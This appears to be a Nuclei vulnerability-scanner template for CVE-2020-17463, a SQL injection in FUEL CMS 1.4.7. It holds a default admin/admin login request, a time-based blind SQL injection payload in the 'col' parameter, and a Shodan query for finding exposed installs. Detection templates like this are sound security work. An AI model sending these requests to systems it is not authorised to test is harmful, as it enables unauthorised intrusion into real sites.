nuclei-templates/http/cves/2020/CVE-2020-17463.yaml

57 lines
1.4 KiB
YAML
Raw Normal View History

id: CVE-2020-17463
info:
2023-07-16 09:56:13 +00:00
name: FUEL CMS 1.4.7 - SQL Injection
2023-07-16 10:05:17 +00:00
author: Thirukrishnan
severity: high
description: |
FUEL CMS 1.4.7 allows SQL Injection via the col parameter to /pages/items, /permissions/items, or /navigation/items.
remediation: Fixed in version 115
reference:
- https://www.exploit-db.com/exploits/48741
classification:
cve-id: CVE-2020-17463
2023-07-16 09:56:13 +00:00
metadata:
max-request: 3
verified: true
shodan-query: http.title:"fuel cms"
tags: cve,cve2020,sqli,fuel-cms
http:
- raw:
- |
2023-07-16 09:56:13 +00:00
GET /fuel HTTP/1.1
Host: {{Hostname}}
- |
2023-07-16 09:56:13 +00:00
POST /fuel/login/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2023-07-16 15:31:00 +00:00
Referer: {{RootURL}}
2023-07-16 09:56:13 +00:00
user_name={{username}}&password={{password}}&Login=Login&forward=
- |
2023-07-16 09:56:13 +00:00
@timeout: 10s
GET /fuel/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
2023-07-16 15:31:00 +00:00
Referer: {{RootURL}}
2023-07-16 09:56:13 +00:00
payloads:
username:
- admin
password:
- admin
attack: pitchfork
cookie-reuse: true
matchers:
- type: dsl
dsl:
2023-07-16 09:56:13 +00:00
- 'duration>=6'
- 'status_code_3 == 200'
- 'contains(body_3, "No data to display")'
condition: and